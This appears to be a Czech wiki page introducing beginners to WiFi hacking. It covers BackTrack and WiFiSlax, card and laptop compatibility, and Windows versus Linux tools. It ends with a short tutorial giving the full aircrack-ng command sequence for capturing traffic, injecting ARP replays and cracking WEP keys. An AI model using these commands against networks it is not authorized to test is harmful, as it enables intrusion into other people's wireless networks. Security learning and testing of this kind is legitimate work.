Úvod do WiFi Hackingu

Z WiKi AIRdump.CZ

Tento text je psán na četné žádosti pro každého kdo nemá absolutně žádnou zkušenost s penetračním testováním operačních systémů, zabezpečení bezdrátových síti, šifrování atp. Text je průvodcem jak začít a naleznete zde několik tipů pro operační systém BackTrack Linux CZ resp viz BackTrack FAQ. Text lze doplňovat nebo komentovat. 1. pokud jste registrována ve WiKi lze diskutovat o obsahu přímo v záhlaví stránky t.j WiKi diskuze 2. nebo ve Fóru kde je pro tento účel přímo vytvořeno vlákno. Zde bude vložena a zapracována každá, i ta nejbanálnější připomínka, proto neváhejte a píšte. Téma bude zpracováno ve formě FAQ.

Obsah 1 Slovník základních pojmů 2 Operační systém 3 Teorie prolomení WEP 4 WEP cracking včera a dnes 5 WiFi karta 6 Laptop a crack WEP 7 Windows nebo Linux? 8 Instalace závislostí 9 Jak ovládat aplikace 10 Newbie tutoriál 11 Užitečné odkazy

Slovník základních pojmů

V slovníku najdete vysvětlivky nebo odkazy na nejfrekventovanější fráze v oboru WiFi a networking

Operační systém

Pokud to s WiFi hackingem myslíš vážně a máš zájem využívat veškeré techniky používej Linux. Speciální distribuce Backtrack nebo WiFiSlax obsahují veškeré nástroje a ovládače a naše počeštěná verze mé v našem fóru přímo i podporu.

Teorie prolomení WEP

• Hacking WiFi sítí
• WiFi Hacking FAQ

WEP cracking včera a dnes

WiFi karta

Na portálu je seznam bezdrátových karet které je možné pořídit na českém trhu (popřípadě slovenském). Seznam neobsahuje každou kartu, proto je možné, že existují další vhodné kusy hardware. Neberte proto seznam jako definitivní, pouze jako vodítko.

Laptop a crack WEP

Hodí se laptop (notebook) pro crack WEP nebo WPA zabezpečených WiFi sítí? Hlavní nevýhodou přenosného počítače je, že postráda konektor na externí anténu. Znám pouze jeden starší model který konektor na externí anténu má. Další nevýhoda je, že většina modelů (napříč spektrem značek) se dodáva ve stavu kdy je "skoro nemožné" nahradit stávajíci miniPCI wifi kartu vhodnějším modelem. Toto je způsobeno tkz. White listem v BIOSu (jedná se spíše o Blacklist). Tato situace není nijak medializována a komentována. Nebuďte proto překvapení když kartu nahradíte novou a váš přenosný počítač nenastartuje. Pokud zakoupíte laptop (notebook) s Express Card slotem (tedy bez PCMCIA) a v BIOSu máte zmiňované omezení, stáva se vaše investice v tomto směru nepoužitelnou, protože momentálně [duben 2008] neexistuje způsob jak injektovat s Express Card WiFi hardware.

Windows nebo Linux?

Díky portu Linux aplikací na platformu Windows je do jisté míry možné používat i operační systém Windows. Packet Injection ale ve Windows nefunguje stabilně nebo vůbec. Většina aplikací která umožňuje analyzovat síťový provoz je komerčního charakteru. Nekomerční aplikace jako Wireshark vyžadují pokročilou znalost síťové problematiky a protokolů. Klikací aplikace jako AiroPeek nebo CommView for WiFi jsou placené. Aktuálně existuje i free verze pod jménem OmniPeek Personal, ta ale v porovnání s AiroPeek nedisponuje řadou vychytávek. Bez praxe a znalostí filtrů jak ve Wireshark tak i v komerčních produktech, nezkušený uživatel nenajde ani paket.

Instalace závislostí

Standardní (neupravené) operační systémy (Ubuntu, Debian, Windows) až na výjimky neobsahují ovládače které umí monitor mode a packet injection. Toto na platformě Windows řeší aplikace (a jejich ovládače) jako CommView for WiFi a Airopeek (OmniPeek), na platformě specializované distribuce jako BackTrack a WiFiSlax.

Jak ovládat aplikace

Newbie tutoriál

V tutoriál Hacking WiFi sítí je komplexně popsána problematika včetně všech technik. Celý postup je o těchto příkazech.

Přepnutí bezdrátove karty do Monitor Modu

iwconfig [rozhraní] mode Monitor

Spuštení stumbleru Airodump pro detekci a logování bezdrátových sítí

airodump-ng --ivs -w data --ch [číslo 1 až 14] [rozhraní]

Aireplay-ng umí několik technik které rychleji vygenerují data pro crack WEP klíče. Uvádím pouze nejpoužívanější (asociace + ARP request)

aireplay-ng -1 0 -e access-point-doma -a 00:11:22:33:44:55 -h 00:11:22:33:44:66 [rozhraní]

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:33:44:66 -x 600 [rozhraní]

Aircrack-ng je aplikace pro crack WEP klíče

aircrack-ng *.ivs

• [něco] v hranaté zátvorce je libovolný volitelný parametr t.z u kanálu budu nahrazen číslem třeba 8 bez [] u rozhraní třeba ath0 bez [].
• sudo + [příkaz iwconfig] používejte pouze mimo distribuce Backtrack a Wifislax, tam se přihlašujete do systému jako root.
• místo [rozhraní] používejte název vaší wifi karty v systému (wifi0, ath0, ra0 atd).

Užitečné odkazy

• WiFi Hacking FAQ
• Nápověda pro Aircrack-ng
• Sniffing
• Kompatibilní WiFi karty